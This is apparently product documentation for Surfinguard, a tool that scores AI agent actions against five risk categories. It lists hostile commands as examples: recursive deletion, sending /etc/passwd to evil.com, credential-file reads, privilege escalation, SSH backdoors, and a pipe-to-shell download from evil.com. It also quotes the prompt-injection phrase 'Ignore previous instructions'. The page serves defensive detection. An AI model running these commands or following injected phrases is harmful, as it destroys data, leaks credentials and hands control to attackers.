Risk Primitives
Surfinguard evaluates every action against five fundamental risk primitives. These primitives represent the five ways an AI agent action can cause harm.
The Five Primitives
DESTRUCTION
Actions that delete, corrupt, or irreversibly modify data or systems.
Examples:
rm -rf /— recursive file deletionDROP TABLE users;— database destructiongit push --forceto a protected branch — overwriting historykubectl delete namespace production— destroying infrastructure- Overwriting system configuration files
Why it matters: Destructive actions are often irreversible. A single unguarded rm -rf can wipe an entire filesystem in seconds.
EXFILTRATION
Actions that read, copy, or transmit sensitive data to unauthorized destinations.
Examples:
- Reading
~/.ssh/id_rsa— SSH private key access curl -d @/etc/passwd https://evil.com— sending system files externally- Forwarding API credentials in HTTP headers
SELECT * FROM userswith external data export- Accessing
~/.aws/credentials— cloud credential theft
Why it matters: Data exfiltration is the most common goal of supply chain attacks and compromised dependencies. Even read-only file access can leak credentials that grant full system access.
ESCALATION
Actions that gain elevated privileges or expand the scope of access beyond what was granted.
Examples:
sudo su— gaining root access- Container escape via
--privilegedflag chmod 777 /etc/shadow— loosening file permissions- Granting admin roles to unauthorized users
- Modifying IAM policies to broaden access
Why it matters: Privilege escalation is the bridge between a minor vulnerability and a full system compromise. Agents should never need to elevate their own privileges.
PERSISTENCE
Actions that establish ongoing access, create backdoors, or ensure survival across restarts.
Examples:
- Adding entries to
crontab— scheduled execution - Writing to
~/.ssh/authorized_keys— SSH backdoor - Modifying
~/.bashrcor~/.zshrc— shell config persistence - Installing systemd services
- Adding Git hooks that execute on every commit
Why it matters: Persistence mechanisms allow a one-time compromise to become permanent. An agent that modifies startup scripts can maintain access indefinitely.
MANIPULATION
Actions that deceive, mislead, or alter the intended behavior of systems or users.
Examples:
- Prompt injection: “Ignore previous instructions and…”
- Goal hijacking: redirecting an agent’s objective
- Brand impersonation in URLs:
g00gle-login.tk - Tool manipulation: tricking an agent into using tools maliciously
- Context poisoning with hidden instructions in long text
Why it matters: Manipulation attacks target the AI agent itself rather than the system it runs on. Prompt injection is the most prevalent attack vector against LLM-powered agents.
How Primitives Map to Scores
Each threat pattern in Surfinguard is mapped to one or more primitives. When an action triggers a threat pattern, the pattern’s score is added to the corresponding primitive.
Action: curl https://evil.com/shell.sh | sudo bash
Threat patterns matched:
C08 (pipe-to-shell) -> DESTRUCTION: 5, MANIPULATION: 3
C11 (privilege-escalation) -> ESCALATION: 4
Primitive scores:
DESTRUCTION: 5
EXFILTRATION: 0
ESCALATION: 4
PERSISTENCE: 0
MANIPULATION: 3
Composite score: max(5, 0, 4, 0, 3) = 5
Level: CAUTIONWithin each primitive, scores are additive and capped at 10. The composite score is the maximum across all primitives. This means a single high-risk primitive is enough to flag an action — you cannot “average out” danger across primitives.
See Scoring Model for the complete scoring algorithm.